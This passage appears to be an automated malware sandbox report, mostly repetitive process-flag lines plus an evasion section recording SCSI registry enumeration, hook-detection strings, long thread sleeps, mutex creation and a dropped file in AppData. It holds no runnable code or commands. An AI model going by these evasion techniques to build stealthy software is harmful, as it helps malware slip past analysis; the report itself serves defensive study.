              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\wihaduvProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_02C23862
              Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_24-887
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeAPI/Special instruction interceptor: Address: 7FF8418CE814
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeAPI/Special instruction interceptor: Address: 7FF8418CD584
              Source: aspnet_regbrowsers.exe, 0000000D.00000002.1778697183.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: C:\Users\user\AppData\Roaming\wihaduvMemory allocated: 1650000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wihaduvMemory allocated: 3100000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\wihaduvMemory allocated: 2F00000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C216C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_02C216C7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\wihaduvThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3635Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6118Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7587Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2039Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1390Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5388Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4386Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 415
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 921
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 598
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 830
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 830
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep time: -16602069666338586s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 7587 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep count: 2039 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep count: 1390 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep count: 144 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep count: 335 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep count: 5388 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 936Thread sleep count: 4386 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep time: -23058430092136925s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 8044Thread sleep count: 415 > 30
              Source: C:\Windows\explorer.exe TID: 8024Thread sleep count: 921 > 30
              Source: C:\Windows\explorer.exe TID: 8024Thread sleep time: -92100s >= -30000s
              Source: C:\Windows\explorer.exe TID: 8048Thread sleep count: 598 > 30
              Source: C:\Windows\explorer.exe TID: 8048Thread sleep time: -59800s >= -30000s
              Source: C:\Users\user\AppData\Roaming\wihaduv TID: 3324Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\explorer.exe TID: 2972Thread sleep count: 47 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 2972Thread sleep time: -47000s >= -30000s
